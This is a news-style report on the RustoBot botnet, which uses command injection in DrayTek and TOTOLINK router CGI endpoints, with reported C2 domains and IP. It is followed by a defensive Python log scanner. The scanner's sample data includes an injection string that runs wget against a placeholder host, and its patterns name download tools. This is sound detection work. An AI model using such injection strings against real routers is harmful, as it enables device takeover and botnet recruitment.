A new advanced botnet malware written in the Rust programming language was uncovered targeting vulnerable routers around the world. It abused critical flaws in DrayTek and TOTOLINK routers to remotely run command injections, possibly impacting technology sectors of Mexico, Taiwan, Vietnam and Japan.
Cybersecurity researchers named the malware “RustoBot” because of its Rust-based implementation. The malware mainly targets DrayTek Vigor2960 and Vigor300B through CVE-2024-12987, an OS command injection vulnerability in the ‘cgi-bin/mainfunction.cgi/apmcfgupload’ interface. The attack sequence starts with a payload that exploits this vulnerability.
Similarly, the malware targets TOTOLINK router models such as N600R, A950RG, A800R, A830R, A3100R, A3000RU, and A810R via flaws in the ‘cstecgi.cgi’ file, a CGI script that handles administrative commands and user input.
The command injection vulnerabilities in the script enable threat actors to execute code remotely on affected devices. A crafted request containing a malicious command string, sent to the vulnerable ‘cstecgi.cgi’ endpoint, downloads and runs the malware on the compromised device.
Fortinet researchers found that after the initial attack, RustoBot uses four different downloader scripts to deliver multiple architecture-specific payloads targeting the ARM5, ARM6, ARM7, MPSL, and MIPS architectures. The multiple-architecture approach makes the malware compatible with several router models and systems.
RustoBot has a complex design which utilises advanced techniques for operation and evasion. It uses XOR encryption to encode its configuration data and fetches system API functions from the Global Offset Table (GOT).
The botnet uses intricate instruction sequences to determine decoder key offsets. When it is installed on a breached system, the malware attempts to resolve four domains to the same IP address (5.255.125.150) to connect to the command-and-control infrastructure. The domains resolved are dvrhelper.anondns.net, techsupport.anondns.net, rustbot.anondns.net, and miraisucks.anondns.net.
Following the established connection, it waits for a set of parameters that act as commands to trigger a DDoS attack. It is capable of launching DDoS attacks via the Raw IP, TCP and UDP protocols.
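A defender-side check combining the indicators reported above, added here as an example that is not from the original report or from Fortinet: it scans web-server access log lines for requests to the two exploited CGI endpoints (escalating when shell metacharacters or a download tool appear in the query) and resolver log lines for lookups of the four C2 domains or answers pointing at their shared IP. The log formats, the query parameter name “q” and all sample addresses are constructed assumptions.

```python
import re
from urllib.parse import unquote
# Indicators as reported for RustoBot: exploited CGI endpoints, C2 domains, C2 IP.
TARGETED_CGI = ("mainfunction.cgi/apmcfgupload", "cstecgi.cgi")
C2_DOMAINS = {"dvrhelper.anondns.net", "techsupport.anondns.net",
              "rustbot.anondns.net", "miraisucks.anondns.net"}
C2_IP = "5.255.125.150"
# Shell metacharacters and fetch tools that mark a command-injection string.
INJECT_RE = re.compile(r"[;|`]|\$\(|\b(wget|curl|tftp)\b", re.IGNORECASE)
# Common Log Format (assumed): client - - [time] "METHOD target HTTP/x" status size
ACCESS_RE = re.compile(r'^(?P<src>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) '
                       r'(?P<target>\S+)[^"]*" (?P<status>\d{3})')
# Resolver log format (constructed for this example): time client qname answer
DNS_RE = re.compile(r"^\S+ (?P<client>\S+) (?P<qname>\S+) (?P<answer>\S+)$")

def check_access(line):
    """Flag requests to the exploited endpoints; escalate when injection syntax appears."""
    m = ACCESS_RE.match(line)
    if not m:
        return None
    path, _, query = unquote(m.group("target")).partition("?")  # decode %3B etc.
    hit = next((ep for ep in TARGETED_CGI if ep in path), None)
    if hit is None:
        return None
    severity = "high" if INJECT_RE.search(query) else "medium"
    return {"src": m.group("src"), "endpoint": hit, "severity": severity}

def check_dns(line):
    """Flag lookups of the C2 domains, or any answer pointing at the shared C2 IP."""
    m = DNS_RE.match(line)
    if not m:
        return None
    qname, answer = m.group("qname").rstrip(".").lower(), m.group("answer")
    if qname in C2_DOMAINS or answer == C2_IP:
        return {"src": m.group("client"), "qname": qname, "answer": answer, "severity": "high"}
    return None

def scan(access_lines, dns_lines):
    return [a for a in map(check_access, access_lines) if a] + \
           [a for a in map(check_dns, dns_lines) if a]

# Constructed sample records (not real traffic); the query parameter "q" is a placeholder.
SAMPLE_ACCESS = [
    '203.0.113.7 - - [20/Apr/2025:10:00:01 +0000] "GET /cgi-bin/mainfunction.cgi/apmcfgupload?q=%3Bwget+http://203.0.113.9/a.sh HTTP/1.1" 200 12',
    '198.51.100.4 - - [20/Apr/2025:10:00:02 +0000] "GET /cgi-bin/cstecgi.cgi?action=status HTTP/1.1" 200 512',
    '192.0.2.10 - - [20/Apr/2025:10:00:03 +0000] "GET /index.html HTTP/1.1" 200 1024',
]
SAMPLE_DNS = ["2025-04-20T10:00:05Z 10.0.0.5 rustbot.anondns.net. 5.255.125.150",
              "2025-04-20T10:00:06Z 10.0.0.6 example.com. 93.184.216.34"]
```

Any access to these endpoints from outside the management network deserves review even at “medium”, since the vulnerable parameter is not visible in a GET line and POST bodies are not logged.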
The new threat draws attention to the vulnerabilities found in network and IoT devices as well as the evolving complexity of botnet malware using modern programming languages such as Rust for enhanced stability and cross-platform compatibility.